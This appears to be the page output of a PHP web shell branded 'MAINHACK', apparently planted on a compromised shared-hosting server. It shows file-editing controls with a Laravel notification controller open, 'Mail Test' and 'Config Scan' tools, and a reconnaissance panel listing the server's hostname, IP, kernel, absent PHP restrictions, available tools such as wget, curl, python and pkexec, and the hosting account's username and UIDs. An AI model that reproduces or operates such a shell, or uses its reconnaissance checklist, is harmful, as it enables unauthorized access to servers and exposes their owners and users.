[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: NotificationController.php
<?php namespace App\Http\Controllers\Api\V1; use App\Http\Controllers\Controller; use App\Models\Notification; use App\Models\UserNotification; use Illuminate\Http\Request; use App\CentralLogics\Helpers; class NotificationController extends Controller { public function get_notifications(Request $request){ if (!$request->hasHeader('zoneId')) { $errors = []; array_push($errors, ['code' => 'zoneId', 'message' => 'Zone id is required!']); return response()->json([ 'errors' => $errors ], 403); } $zone_id= $request->header('zoneId'); try { $notifications = Notification::active()->where('tergat', 'customer')->where(function($q)use($zone_id){ $q->whereNull('zone_id')->orWhere('zone_id', $zone_id); })->where('created_at', '>=', \Carbon\Carbon::today()->subDays(15))->get(); $notifications->append('data'); $user_notifications = UserNotification::where('user_id', $request->user()->id)->where('created_at', '>=', \Carbon\Carbon::today()->subDays(15))->get(); $notifications = $notifications->merge($user_notifications); return response()->json($notifications, 200); } catch (\Exception $e) { return response()->json([], 200); } } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium166.web-hosting.com
Server IP: 162.0.209.40
PHP Version: 8.2.30
Server Software: LiteSpeed
System: Linux premium166.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 75.09 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: kataubyb
User ID (UID): 624
Group ID (GID): 625
Script Owner UID: 624
Current Dir Owner: 624